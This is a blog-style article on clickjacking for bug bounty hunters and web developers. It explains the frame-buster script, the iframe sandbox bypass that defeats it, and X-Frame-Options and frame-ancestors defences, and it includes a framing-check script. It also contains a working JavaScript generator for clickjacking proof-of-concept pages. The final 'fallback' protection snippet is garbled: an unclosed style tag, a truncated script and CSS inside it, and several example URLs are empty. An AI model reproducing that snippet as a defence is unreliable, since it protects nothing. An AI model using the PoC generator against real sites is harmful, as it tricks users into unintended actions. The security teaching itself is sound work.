Clickjacking - Web Application Security


Hey guys,

I just wanted to share some information about Clickjacking. It is usually rated a low- to medium-risk issue, but the real risk depends on the site: on what a single misplaced click can do there. I'm writing this note for bug bounty hunters and web developers.

I'm sure most of you already know what Clickjacking is, but if you don't, read the next paragraph; otherwise skip it.

What is Clickjacking? If a website lets itself be loaded inside an iframe, that is, if you put it in <iframe src=""></iframe> on a page of your own and the site still renders, then it can be clickjacked. How does that hurt? Suppose the site has a page with a sensitive button or form, for example the page where a user confirms a payment or changes account settings. The attacker builds a page that loads that site in an iframe, makes the iframe transparent with CSS, and positions it over a harmless-looking decoy ("click here to continue"). The attacker puts that page somewhere on the web; when a logged-in victim visits it and clicks the decoy, the click actually lands on the real site's button, and the site accepts it because the request comes from the victim's own browser and session. Note that the attacker cannot read what is inside the frame (the browser's same-origin policy prevents that), so the damage lies in the actions the victim is tricked into performing, not in data typed into the attacker's page; and in browsers that treat cookies as SameSite=Lax by default, the framed page only loads with the victim's session if the site marks its cookies SameSite=None, so always check whether the framed page is actually logged in before rating the issue. Clickjacking belongs to the family of "Trust Based Exploits": the victim trusts what they see, and what they see is not what they click.

I Hope You're Not Using This Code To Protect Your Site Against Clickjacking: If you own a website and you're using the code below to protect it against clickjacking, be worried.

if (self !== top) {
    top.location = self.location;   // framed: redirect the top window to this page
}

The code above redirects the browser to the real site as soon as the page detects that it is inside a frame. The reason not to rely on it is that it can be bypassed. Suppose your site has the URL "" and uses that code; an attacker frames it like this:

<iframe src="" sandbox="allow-forms allow-scripts">

The sandbox attribute restricts what the framed document may do. Scripts still run (allow-scripts) and forms still submit (allow-forms), but navigating the top window requires allow-top-navigation, which the attacker simply leaves out, so top.location = self.location fails silently and the page stays inside the frame. (Without allow-scripts the frame-buster would not run at all.) Not everyone uses this protection, but many sites still do. If you're a developer, at least make sure you are not relying on it; if you're a bug bounty hunter and a site has this protection, try the sandbox bypass and report it if it works.
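As an added example (this is not code from the original post), the following JavaScript builds the HTML of the proof-of-concept page described above: a decoy button, and the target page loaded over it in a transparent, sandboxed iframe whose sandbox omits allow-top-navigation so the frame-buster cannot fire. TARGET_URL, the decoy text and the pixel offsets are assumed placeholders; run it with Node, save the output as an .html file and open it in a browser against a page you are authorised to test.

```javascript
// Added example, not from the original post. Generates a clickjacking PoC page.
const TARGET_URL = "https://target.example/account/delete"; // assumption: the framable page under test
const SANDBOX = "allow-forms allow-scripts";                 // deliberately no allow-top-navigation

// Escape the characters that matter inside HTML text and attribute values, so a
// target URL or decoy string containing quotes cannot break the generated markup.
function escapeAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]);
}

// True when a sandbox token list stops `top.location = self.location` inside the
// frame: top navigation is only permitted by one of these two tokens.
function sandboxDefeatsFrameBuster(tokens) {
  const t = tokens.toLowerCase().split(/\s+/).filter(Boolean);
  return !t.includes("allow-top-navigation") &&
         !t.includes("allow-top-navigation-by-user-activation");
}

// offsetX/offsetY shift the frame so the target's sensitive button sits exactly
// under the decoy; opacity 0.5 is handy while aligning, 0 for the real PoC.
function buildPoc({ target, sandbox = SANDBOX, opacity = 0, offsetX = 0, offsetY = 0,
                    decoy = "Click here to continue" }) {
  if (!sandboxDefeatsFrameBuster(sandbox)) {
    throw new Error("sandbox permits top navigation; a frame-buster in the target would win");
  }
  return `<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>Clickjacking PoC</title>
<style>
  #decoy  { position: absolute; top: 200px; left: 100px; z-index: 1; }
  #target { position: absolute; top: ${offsetY}px; left: ${offsetX}px; width: 1200px; height: 900px;
            border: 0; opacity: ${opacity}; z-index: 2; }  /* transparent frame on top receives the click */
</style></head>
<body>
<button id="decoy">${escapeAttr(decoy)}</button>
<iframe id="target" src="${escapeAttr(target)}" sandbox="${escapeAttr(sandbox)}"></iframe>
</body></html>`;
}

// Usage: node poc.js > poc.html
console.log(buildPoc({ target: TARGET_URL, opacity: 0.5, offsetX: -40, offsetY: -120 }));
```

If the target's own scripts stop working because the sandboxed document runs with an opaque origin, add allow-same-origin to the sandbox; the frame-buster still cannot navigate the top window, because that is governed only by the allow-top-navigation tokens that buildPoc refuses to include.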

How should I protect my site from Clickjacking? The easiest way is to send the X-Frame-Options response header. On Apache, put one of the lines below in your .htaccess (mod_headers must be enabled). Use set rather than append: append adds to an existing header of the same name and produces a comma-joined value, while X-Frame-Options is defined with a single value.

If pages of your own site need to frame each other, but nobody else should be able to frame you: Header always set X-Frame-Options "SAMEORIGIN"

If nothing on your site needs to be framed, not even by your own pages: Header always set X-Frame-Options "DENY"
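Whether a header actually protects a page is something both developers and bug bounty hunters end up checking by hand. The JavaScript below is an added example (not code from the original post) that takes a response's headers and decides whether a page at a given origin could frame it, following the rules browsers apply: the Content-Security-Policy directive frame-ancestors takes precedence when present (it is the modern replacement for X-Frame-Options and can list allowed origins, which ALLOW-FROM never reliably did), otherwise only DENY and SAMEORIGIN count, and any other X-Frame-Options value is ignored by current browsers. The sample responses, target and attacker origins are constructed; as labelled simplifications, origins are compared by scheme and host only, and CSP host-sources support an optional scheme and a leading "*." wildcard but not ports or paths.

```javascript
// Added example, not from the original post: would a browser let framerOrigin embed
// a page served with these headers? Only the enforcing CSP header is considered;
// Content-Security-Policy-Report-Only never blocks anything.
function originParts(origin) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/:?#]+)/i.exec(origin);
  if (!m) throw new Error("not an origin: " + origin);
  return { scheme: m[1].toLowerCase(), host: m[2].toLowerCase() }; // ports ignored (simplification)
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host;
}

// Does one frame-ancestors source expression admit the framer?
function sourceMatches(src, framer, target) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return sameOrigin(framer, target);
  if (s === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.scheme === s.slice(0, -1); // scheme-source, e.g. "https:"
  let scheme = null, host = s;
  const m = /^([a-z][a-z0-9+.-]*):\/\/(.+)$/.exec(s);
  if (m) { scheme = m[1]; host = m[2]; }
  if (scheme !== null && scheme !== framer.scheme) return false;
  if (host.startsWith("*.")) return framer.host.endsWith(host.slice(1)); // "*.x.example" matches "a.x.example"
  return framer.host === host;
}

// Source list of the frame-ancestors directive, or null when the directive is absent.
function frameAncestorsSources(csp) {
  if (typeof csp !== "string") return null;
  for (const directive of csp.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === "frame-ancestors") return tokens.slice(1);
  }
  return null;
}

// Returns { verdict: "framable" | "blocked" | "conflicting", reason }.
function framingVerdict(headers, framerOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v; // header names are case-insensitive
  const framer = originParts(framerOrigin);
  const target = originParts(targetOrigin);

  // frame-ancestors wins: browsers that support it ignore X-Frame-Options when it is present.
  const sources = frameAncestorsSources(h["content-security-policy"]);
  if (sources !== null) {
    const ok = sources.some((s) => sourceMatches(s, framer, target));
    return { verdict: ok ? "framable" : "blocked", reason: "frame-ancestors " + sources.join(" ") };
  }

  // X-Frame-Options takes one value. A comma-joined list (what Apache's `Header append`
  // can produce) is deduplicated; distinct values are reported as conflicting.
  const raw = h["x-frame-options"];
  const values = raw === undefined ? []
    : [...new Set(raw.split(",").map((v) => v.trim().toUpperCase()).filter(Boolean))];
  if (values.length === 0) return { verdict: "framable", reason: "no X-Frame-Options and no frame-ancestors" };
  if (values.length > 1) {
    return { verdict: "conflicting", reason: "X-Frame-Options has several distinct values: " + values.join(", ") };
  }
  if (values[0] === "DENY") return { verdict: "blocked", reason: "X-Frame-Options DENY" };
  if (values[0] === "SAMEORIGIN") {
    return { verdict: sameOrigin(framer, target) ? "framable" : "blocked", reason: "X-Frame-Options SAMEORIGIN" };
  }
  // Anything else (ALLOW-FROM included) is not understood by current browsers and gives no protection.
  return { verdict: "framable", reason: "X-Frame-Options value ignored by browsers: " + values[0] };
}

// Constructed sample responses for a hypothetical https://target.example (not captured from any real site).
const TARGET = "https://target.example";
const ATTACKER = "https://evil.example";
const SAMPLES = {
  none:       { "Content-Type": "text/html" },
  deny:       { "X-Frame-Options": "DENY" },
  sameorigin: { "x-frame-options": "sameorigin" },
  allowFrom:  { "X-Frame-Options": "ALLOW-FROM https://partner.example" },
  csp:        { "X-Frame-Options": "DENY",
                "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example" },
};

for (const [name, headers] of Object.entries(SAMPLES)) {
  const r = framingVerdict(headers, ATTACKER, TARGET);
  console.log(name.padEnd(11), r.verdict.padEnd(11), r.reason);
}
```

A "conflicting" verdict means the header is malformed and should be fixed (one value, set with Header always set) rather than reasoned about; browsers each have their own rules for that case, and relying on them is exactly what you are trying to avoid.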

I am getting a 500 error: Sometimes, because of how the server is configured, those lines produce an Internal Server Error on every page. The usual reason is that mod_headers is not loaded, or .htaccess overrides are not allowed, so Apache rejects the Header directive. The proper fix is on the server side (enable mod_headers, or ask your host to). Wrapping the directive in an <IfModule mod_headers.c> block makes the error go away, but it also silently drops the protection, so check the response headers afterwards. If you cannot change the server at all, use the code below instead. Put it between the <head> and </head> tags.

 <style id="cj">
body { display:none !important;}
<script type="text/javascript">
if (self === top){var
body { display:block !important; } </style>

I hope you like this article! This is the first time I've written such a long article about web security!
